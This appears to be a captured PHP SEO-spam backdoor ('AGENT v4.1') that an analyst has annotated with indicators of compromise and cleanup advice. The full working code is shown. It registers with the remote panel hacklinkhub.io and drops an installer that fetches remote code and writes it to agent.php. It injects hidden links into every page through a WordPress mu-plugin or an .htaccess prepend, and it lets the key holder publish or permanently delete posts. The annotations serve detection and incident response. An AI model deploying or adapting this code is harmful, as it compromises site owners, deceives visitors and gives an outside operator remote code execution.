<?php
/*
=================================
AGENT v4.1
Don't touch it, don't change it; if it breaks they'll screw us badly
=================================
*/

// ---------------------------------------------------------------------------
// Analyst notes (defensive reading of this sample)
//
// What the script does, as visible in this file:
//   1. Drops a second-stage installer (install-agent.php) next to itself.
//   2. Registers the host with a remote panel and stores the returned
//      credentials in a hidden JSON file.
//   3. Sends a signed heartbeat and pulls a list of links from the panel.
//   4. Installs a renderer that appends those links (1px font, optionally
//      display:none) to every HTML response, through a WordPress mu-plugin
//      or through an .htaccess auto_prepend_file directive.
//   5. Exposes two POST actions that create and permanently delete
//      WordPress posts on request from whoever holds the site key.
//
// Indicators present in this file (useful for hunting and cleanup):
//   - Remote host:        hacklinkhub.io  (/panel/api/site, /agent/agent.txt)
//   - Files in docroot:   .site_agent.json, .site_links.json,
//                         .panel_render.php, install-agent.php, agent.php
//   - WordPress:          wp-content/mu-plugins/panel-links.php
//   - .htaccess:          a line starting "php_value auto_prepend_file"
//   - Request markers:    ?panel_check, ?debug, POST fields delete_blog /
//                         publish_blog, header X-SITE-KEY
//   - Response markers:   "SYNC_OK", "AGENT OK", "agent_installed",
//                         HTML comments "PANEL LINKS START" / "PANEL LINKS END"
//
// Cleanup has to remove every artifact above together: the installer can
// restore agent.php, and the renderer keeps working from the cached link file
// even if this script is gone.
// ---------------------------------------------------------------------------

// Errors are collected but never shown, so a failing agent leaves no visible
// trace in served pages.
error_reporting(E_ALL);
ini_set('display_errors', 0);

// Remote panel endpoint and the local state files (dot-prefixed, so they are
// hidden from a plain directory listing).
$panelBase = "https://hacklinkhub.io/panel/api/site";
$configFile = __DIR__.'/.site_agent.json';
$linkCache = __DIR__.'/.site_links.json';
$root = __DIR__;

// Any visitor can switch on status output by adding ?debug to the URL.
$debug = isset($_GET['debug']);

// --- Persistence: second-stage installer -----------------------------------
// The embedded script below is written once. When called with the hardcoded
// token it downloads agent.txt from the remote host and writes it to agent.php
// in the same directory with no integrity check, so the remote operator (or
// anyone who knows the token, which is identical in every copy of this sample)
// can replace the code that runs on this host.
// NOTE(review): presumably this file itself is deployed as agent.php - confirm
// against the file name found on disk.
$installerFile = $root.'/install-agent.php';
if(!file_exists($installerFile)){
    $installerCode = '<?php $token = "83fds2kfms3q"; if(($_GET["token"] ?? "") !== $token){ http_response_code(403); exit; } $remote = "https://hacklinkhub.io/agent/agent.txt"; $target = __DIR__."/agent.php"; $ch = curl_init($remote); curl_setopt_array($ch,[ CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 20, CURLOPT_FOLLOWLOCATION => true ]); $data = curl_exec($ch); curl_close($ch); if(!$data){ echo "download_failed"; exit; } file_put_contents($target,$data); echo "agent_installed"; ';
    file_put_contents($installerFile,$installerCode);
}

// --- Unauthenticated status probe -------------------------------------------
// ?panel_check answers without any credential and discloses the agent version
// and the PHP version. The JSON shape is a reliable fingerprint for scanning
// your own estate for infected hosts.
if (isset($_GET['panel_check'])) {
    header('Content-Type: application/json');
    echo json_encode([
        'status' => 'online',
        'domain' => (isset($_SERVER['HTTPS'])?'https://':'http://').$_SERVER['HTTP_HOST'],
        'agent_version' => '4.1',
        'php_version' => PHP_VERSION,
    ]);
    exit;
}

/**
 * Print a status message when ?debug is set, then optionally end the request.
 *
 * @param string $msg  Status text; echoed only in debug mode.
 * @param bool   $stop When true (the default) the script exits after the message.
 */
function out($msg,$stop=true){
    global $debug;
    if($debug) echo $msg."\n";
    if($stop) exit;
}

/**
 * Perform an HTTP request with cURL and return the response body.
 *
 * @param string     $url        Target URL.
 * @param array      $headers    Raw header lines passed to CURLOPT_HTTPHEADER.
 * @param bool       $post       Whether to send a POST request.
 * @param mixed|null $postFields Body passed to CURLOPT_POSTFIELDS.
 * @return string|false Response body, or false when curl_exec() fails.
 */
function curlRequest($url,$headers=[],$post=false,$postFields=null){
    $ch = curl_init($url);
    curl_setopt_array($ch,[
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HTTPHEADER => $headers,
        CURLOPT_POST => $post,
        CURLOPT_POSTFIELDS => $postFields,
        CURLOPT_TIMEOUT => 20,
        CURLOPT_CONNECTTIMEOUT => 10
    ]);
    $res = curl_exec($ch);
    curl_close($ch);
    return $res;
}

/**
 * Guess the CMS from marker files in this script's directory.
 *
 * @return string 'wordpress', 'laravel', 'opencart', or 'php' as the fallback.
 */
function detectCMS(){
    if(file_exists(__DIR__.'/wp-config.php')) return 'wordpress';
    if(file_exists(__DIR__.'/artisan')) return 'laravel';
    if(file_exists(__DIR__.'/config.php') && is_dir(__DIR__.'/catalog')) return 'opencart';
    return 'php';
}

// The reported site URL is built from the request's Host header, i.e. from
// client-supplied data, not from server configuration.
$domain = (isset($_SERVER['HTTPS'])?'https://':'http://').$_SERVER['HTTP_HOST'];

// --- Remote action: permanently delete a WordPress post ---------------------
// Authorisation is a single shared value: the X-SITE-KEY request header must
// equal site_key from .site_agent.json. That same key is stored in plaintext on
// disk and is sent in the query string of the /config request further down, so
// it can also end up in proxy and server logs.
if (isset($_POST['delete_blog'])) {
    if (!file_exists($configFile)) {
        http_response_code(403);
        echo json_encode(['ok' => false, 'error' => 'config_not_found']);
        exit;
    }
    $cfg = json_decode(file_get_contents($configFile), true);
    $key = (string)($_SERVER['HTTP_X_SITE_KEY'] ?? '');
    if (empty($cfg['site_key']) || $key !== $cfg['site_key']) {
        http_response_code(403);
        echo json_encode(['ok' => false, 'error' => 'unauthorized']);
        exit;
    }
    if (!file_exists($root.'/wp-load.php')) {
        echo json_encode(['ok' => false, 'error' => 'not_wordpress']);
        exit;
    }
    // Boots WordPress inside this request so its post API becomes callable.
    require_once $root.'/wp-load.php';
    $remoteUrl = trim((string)($_POST['remote_url'] ?? ''));
    $title = trim((string)($_POST['title'] ?? ''));
    $postId = 0;
    // Resolve the target by URL first, then fall back to an exact title lookup.
    if ($remoteUrl !== '') {
        $postId = url_to_postid($remoteUrl);
    }
    if (!$postId && $title !== '') {
        $post = get_page_by_title($title, OBJECT, 'post');
        if ($post) {
            $postId = (int) $post->ID;
        }
    }
    if (!$postId) {
        echo json_encode(['ok' => false, 'error' => 'post_not_found']);
        exit;
    }
    // Second argument true = force delete: the post bypasses the trash, so it
    // cannot be restored from the WordPress admin afterwards.
    $deleted = wp_delete_post($postId, true);
    if (!$deleted) {
        echo json_encode(['ok' => false, 'error' => 'delete_failed']);
        exit;
    }
    echo json_encode(['ok' => true]);
    exit;
}

// --- Remote action: publish a WordPress post --------------------------------
// Same X-SITE-KEY check as above. Title and content come straight from the
// POST body and the post is created with status 'publish', so it goes live
// immediately. During incident response, review recent posts for content the
// site owner did not write.
if (isset($_POST['publish_blog'])) {
    if (!file_exists($configFile)) {
        http_response_code(403);
        echo json_encode(['ok' => false, 'error' => 'config_not_found']);
        exit;
    }
    $cfg = json_decode(file_get_contents($configFile), true);
    $key = (string)($_SERVER['HTTP_X_SITE_KEY'] ?? '');
    if (empty($cfg['site_key']) || $key !== $cfg['site_key']) {
        http_response_code(403);
        echo json_encode(['ok' => false, 'error' => 'unauthorized']);
        exit;
    }
    if (!file_exists($root.'/wp-load.php')) {
        echo json_encode(['ok' => false, 'error' => 'not_wordpress']);
        exit;
    }
    require_once $root.'/wp-load.php';
    $title = trim((string)($_POST['title'] ?? ''));
    $content = (string)($_POST['content'] ?? '');
    if ($title === '' || trim($content) === '') {
        echo json_encode(['ok' => false, 'error' => 'invalid_payload']);
        exit;
    }
    $postId = wp_insert_post([
        'post_title' => $title,
        'post_content' => $content,
        'post_status' => 'publish',
        'post_type' => 'post',
    ], true);
    if (is_wp_error($postId)) {
        echo json_encode(['ok' => false, 'error' => $postId->get_error_message()]);
        exit;
    }
    echo json_encode(['ok' => true, 'url' => get_permalink($postId)]);
    exit;
}

// --- First run: registration ------------------------------------------------
// With no config file present the host announces its domain and detected CMS
// to the panel. The raw response is written to .site_agent.json without being
// parsed or validated, and the request ends here (out() exits by default), so
// link syncing only starts on a later request.
if(!file_exists($configFile)){
    $response = curlRequest(
        $panelBase."/register",
        ['Content-Type: application/x-www-form-urlencoded'],
        true,
        http_build_query([
            'domain'=>$domain,
            'cms'=>detectCMS()
        ])
    );
    if(!$response) out("REGISTER_FAILED");
    file_put_contents($configFile,$response);
    out("REGISTERED");
}

// Load the stored credentials; both fields are required to continue.
$config = json_decode(file_get_contents($configFile),true);
if(!$config || empty($config['site_key']) || empty($config['site_secret'])) out("INVALID_CONFIG");
$siteKey = $config['site_key'];
$siteSecret = $config['site_secret'];

// --- Heartbeat --------------------------------------------------------------
// Outbound POST signed with HMAC-SHA256 over "METHOD|path|timestamp|nonce"
// using site_secret. The X-SITE-KEY / X-TIMESTAMP / X-NONCE / X-SIGNATURE /
// X-DOMAIN header set is distinctive in egress proxy logs. The response is
// discarded.
$timestamp = time();
$nonce = bin2hex(random_bytes(8));
$path = '/panel/api/site/heartbeat';
$sig = hash_hmac('sha256',"POST|$path|$timestamp|$nonce",$siteSecret);
curlRequest($panelBase."/heartbeat",[
    "X-SITE-KEY: $siteKey",
    "X-TIMESTAMP: $timestamp",
    "X-NONCE: $nonce",
    "X-SIGNATURE: $sig",
    "X-DOMAIN: $domain"
],true);

// --- Fetch the link list ----------------------------------------------------
// Signed GET; note that site_key is additionally placed in the query string.
$timestamp = time();
$nonce = bin2hex(random_bytes(8));
$path = '/panel/api/site/config';
$sig = hash_hmac('sha256',"GET|$path|$timestamp|$nonce",$siteSecret);
$response = curlRequest($panelBase."/config?site_key=".$siteKey,[
    "X-SITE-KEY: $siteKey",
    "X-TIMESTAMP: $timestamp",
    "X-NONCE: $nonce",
    "X-SIGNATURE: $sig"
]);
if(!$response) out("CONFIG_FAILED");
$data = json_decode($response,true);
if(!is_array($data) || !isset($data['links'])) out("INVALID_CONFIG_RESPONSE");

// Cache the links locally. The renderer reads only this file, so injection
// continues while the panel is unreachable or blocked at the network edge.
file_put_contents($linkCache,json_encode([
    'version'=>$data['version']??1,
    'updated_at'=>date('c'),
    'links'=>$data['links']
],JSON_UNESCAPED_UNICODE|JSON_UNESCAPED_SLASHES));

// --- Renderer drop ----------------------------------------------------------
// The embedded script registers an output-buffer callback that builds one <a>
// element per cached link (style "font-size:1px;", plus "display:none;" when
// the entry is flagged hidden) and inserts the block before the first </body>,
// or appends it when the page has no </body>. URL and anchor text are
// HTML-escaped. The rel value is computed into $r but never written into the
// tag. The block is wrapped in "PANEL LINKS START" / "PANEL LINKS END" HTML
// comments, which makes served pages easy to check for injection.
$renderFile = $root.'/.panel_render.php';
if(!file_exists($renderFile)){
    $renderCode = '<?php $cache = __DIR__."/.site_links.json"; if(!file_exists($cache)) return; $data = json_decode(file_get_contents($cache), true); if(empty($data["links"])) return; ob_start(function($buffer) use ($data){ $linksHtml = "\n<!-- PANEL LINKS START -->\n"; foreach($data["links"] as $l){ if(empty($l["url"]) || empty($l["anchor"])) continue; $u = htmlspecialchars($l["url"], ENT_QUOTES); $a = htmlspecialchars($l["anchor"], ENT_QUOTES); $r = !empty($l["rel"]) ? htmlspecialchars($l["rel"]) : "dofollow"; $style = "font-size:1px;"; if(!empty($l["hidden"])) $style .= "display:none;"; $linksHtml .= "<a href=\"".$u."\" style=\"".$style."\">".$a."</a> "; } $linksHtml .= "\n<!-- PANEL LINKS END -->\n"; if(stripos($buffer, "</body>") !== false){ return preg_replace("/<\\/body>/i", $linksHtml."</body>", $buffer, 1); } return $buffer.$linksHtml; });';
    file_put_contents($renderFile, $renderCode);
}

// --- Hook, WordPress variant ------------------------------------------------
// Writes a must-use plugin that includes the renderer on the "init" action.
// Files in wp-content/mu-plugins are loaded by WordPress automatically, with
// no activation step, so this directory needs to be checked explicitly during
// cleanup.
if(file_exists($root.'/wp-load.php')){
    $muDir = $root.'/wp-content/mu-plugins';
    if(!is_dir($muDir)) mkdir($muDir,0755,true);
    $pluginPath = $muDir.'/panel-links.php';
    if(!file_exists($pluginPath)){
        file_put_contents($pluginPath,'<?php if(!defined("ABSPATH")) exit; add_action("init",function(){ $f = ABSPATH.".panel_render.php"; if(file_exists($f)) include $f; });');
    }
}

// --- Hook, non-WordPress variant --------------------------------------------
// Prepends "php_value auto_prepend_file <absolute path to renderer>" to
// .htaccess (or creates the file), so the renderer runs ahead of every PHP
// script under this directory. The write is skipped when a line containing
// "auto_prepend_file" already exists.
// NOTE(review): php_value in .htaccess is a mod_php directive; on hosts running
// PHP through another SAPI this line would be expected to cause server errors,
// which can itself be the first visible symptom - confirm per host.
if(!file_exists($root.'/wp-load.php')){
    $htaccess = $root.'/.htaccess';
    $line = "php_value auto_prepend_file ".$renderFile;
    if(is_writable($root)){
        if(!file_exists($htaccess))
            file_put_contents($htaccess,$line.PHP_EOL);
        else{
            $c = file_get_contents($htaccess);
            if(strpos($c,'auto_prepend_file')===false)
                file_put_contents($htaccess,$line.PHP_EOL.$c);
        }
    }
}

// Final status: a bare "SYNC_OK", or the link count when ?debug is set.
echo $debug ? "AGENT OK\nLinks: ".count($data['links'])."\n" : "SYNC_OK";